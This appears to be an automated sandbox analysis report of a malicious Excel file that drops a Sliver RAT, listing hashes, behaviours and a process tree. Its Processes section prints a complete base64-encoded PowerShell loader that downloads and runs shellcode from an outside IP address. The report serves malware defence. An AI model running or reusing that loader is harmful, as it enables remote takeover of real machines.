Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-11-2024 21:16
Behavioral task
behavioral1
Sample
dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls
Resource
win7-20241010-en
General
-
Target
dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls
-
Size
46KB
-
MD5
a26cd351baea6159ea1979a56dad21db
-
SHA1
83ef2c3be02025d90d4d443cf3fe1fc84277fcb2
-
SHA256
dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578
-
SHA512
f42fe4fc3e7be31638c602ced0c9611a4f182f9f5bad82234d0df9872a58db5fd6980855237ca6078eabf90a6e2208f945d94442619a54fd7577d25c05700eb2
-
SSDEEP
768:D4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:ESFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3924 1516 powershell.exe 82 -
Sliver RAT v2 6 IoCs
resource yara_rule behavioral2/memory/3924-62-0x000001E3FB440000-0x000001E3FBEBE000-memory.dmp SliverRAT_v2 behavioral2/memory/3924-65-0x000001E3FC940000-0x000001E3FD426000-memory.dmp SliverRAT_v2 behavioral2/memory/3924-66-0x000001E3FC940000-0x000001E3FD426000-memory.dmp SliverRAT_v2 behavioral2/memory/3924-64-0x000001E3FC940000-0x000001E3FD426000-memory.dmp SliverRAT_v2 behavioral2/memory/3924-63-0x000001E3FC940000-0x000001E3FD426000-memory.dmp SliverRAT_v2 behavioral2/memory/3924-76-0x000001E3FC940000-0x000001E3FD426000-memory.dmp SliverRAT_v2 -
Sliver family
-
Blocklisted process makes network request 32 IoCs
flow pid Process 23 3924 powershell.exe 26 3924 powershell.exe 31 3924 powershell.exe 35 3924 powershell.exe 36 3924 powershell.exe 39 3924 powershell.exe 40 3924 powershell.exe 42 3924 powershell.exe 43 3924 powershell.exe 44 3924 powershell.exe 45 3924 powershell.exe 47 3924 powershell.exe 49 3924 powershell.exe 61 3924 powershell.exe 62 3924 powershell.exe 63 3924 powershell.exe 75 3924 powershell.exe 76 3924 powershell.exe 77 3924 powershell.exe 78 3924 powershell.exe 79 3924 powershell.exe 80 3924 powershell.exe 81 3924 powershell.exe 82 3924 powershell.exe 83 3924 powershell.exe 84 3924 powershell.exe 85 3924 powershell.exe 86 3924 powershell.exe 87 3924 powershell.exe 88 3924 powershell.exe 89 3924 powershell.exe 90 3924 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3924 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1516 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3924 powershell.exe 3924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3924 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE 1516 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1516 wrote to memory of 3924 1516 EXCEL.EXE 86 PID 1516 wrote to memory of 3924 1516 EXCEL.EXE 86 PID 3924 wrote to memory of 1256 3924 powershell.exe 89 PID 3924 wrote to memory of 1256 3924 powershell.exe 89 PID 1256 wrote to memory of 3452 1256 csc.exe 90 PID 1256 wrote to memory of 3452 1256 csc.exe 90
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D3E.tmp" "c:\Users\Admin\AppData\Local\Temp\phphutyt\CSC2A904C096FD447478D207CE19AE7F1.TMP"4⤵PID:3452
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57778d4e820e391232ea60fa3873fdd89
SHA1fd3b5d53047bf4c1a5f16560ebc41d66a6ff13d6
SHA256b5cdf462a9a28fc0b065c10f5451c926eecf128532d99fd436e4f9664b5964de
SHA512d4fbbb0faa605335ebd640fa6e12adb337e05d97e43a52ad57409514cf7cb10b95f1efe542a2d687534444cba9b94b210ed845680a7bd87b4008b477303aa231
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5856cf077c25c603f01aeb7dadd5f753e
SHA1ce9d50265de193cdde5ec84d25bc2819dc5b8ed2
SHA256a8c38cd2026cdc21d43e8c1ae6fe2bf36c8c42b5ef1149b2717933d656454cf8
SHA5129962dcd4d55abac42bfaa94beaf867b2c205987e6c8906988c81cd2cee7471c5aafb7163743c3c8fe52598f764f49a0fc88ed9b2bbb0b57984b175816baa0aa9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5b7039431a29d664ae0a6e28d2a030a7a
SHA1b8c9192498057085b130146ea17775b3baf32dbf
SHA256d860cc29eceb19347215999a95032a3cf5d4cbc8b7cf95059f6ea8d44dd25c64
SHA5123794a5bc89a56f7168caea9b9ba95fbda1ad56714d3e3dc69659c794aa738df0519d68812564dda50e819c97887546c65a76791205b042f1df17f4bbc8536d4d
-
Filesize
652B
MD57b9a81e634a234ab28f3b53fcb3526f1
SHA17a627ae55d53dc0ea53677e93cf2fda70dfe0fed
SHA25606a87569b6882f9308573fc517204028ae2d4b1bd82d3c7bad321b141ed0cd12
SHA51200e36f5f09d80dff7f027345a13c16edb303fb27333ad32c6208db61a3e5182a44a63cfec4b66abaaf7ad0ebd1d9d2ff954b18d4fa023d61e2116aa60ed6c0b6
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
369B
MD53e174c33287fbd83920a12442c4d0a4d
SHA1cd0ffea739bfc65ed49524a86e2af800e40a2fb3
SHA2564aafc0e3444dfa58b4a5ae2fdbdd52ceb742b9f2dc4f16310dbd116a698b60f1
SHA5125052d3205b006f65f5911e6053619f03f0dd1dc4e13393dad19944a5aaf59dcb9a0729ac42ac51fad9ac236c861d74fc1d1c1f35723dbcd7cfae0d4fa0356b4f